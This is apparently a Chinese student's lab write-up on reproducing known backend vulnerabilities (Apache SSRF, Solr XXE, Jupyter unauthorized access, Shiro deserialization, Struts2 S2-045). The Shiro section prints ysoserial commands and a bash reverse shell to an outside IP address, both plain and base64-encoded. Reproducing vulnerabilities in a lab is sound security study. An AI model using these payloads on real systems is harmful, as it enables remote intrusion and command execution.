后端漏洞(下)
Apache HTTPD 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438)
- 复现
Apache solr XXE漏洞(CVE-2017-12629)
- 复现环境中的XXE漏洞
- 利用XXE漏洞发送HTTP请求,在VPS服务器接收请求,或收到DNS记录。(SSRF利用)
3. 利用XXE漏洞读取本地的 /etc/passwd文件。(文件读取利用)
python开启http服务器
/usr/bin/python3.6 -m http.server 2333
Jupyter Notebook 未授权访问漏洞
- 复现环境中的未授权访问漏洞,登录Jupyter Web管理界面
- 利用Jupyter Notebook控制台执行系统命令,读取/etc/passwd内容
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
- 复现环境中的反序列化漏洞
构造poc.ser
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 “touch /tmp/success” > poc.ser
对序列化文件ACE加密并Base64编码后提交
成功生成/tmp/success
- 尝试利用漏洞执行系统命令,列出/etc目录的文件结构
通过反弹shell执行
构造反弹shell命令:bash -i >& /dev/tcp/47.109.111.193/2333 0>&1
对命令作base64处理:
bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDkuMTExLjE5My8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}
ysoserial构造序列化文件:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 “bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDkuMTExLjE5My8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}” > poc.ser
对poc.ser作ACE加密并Base64编码后提交:
Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)
- 复现环境中的OGNL表达式注入漏洞
- 尝试利用漏洞执行系统命令,读取当前目录下的pom.xml内容
Comments
Leave a comment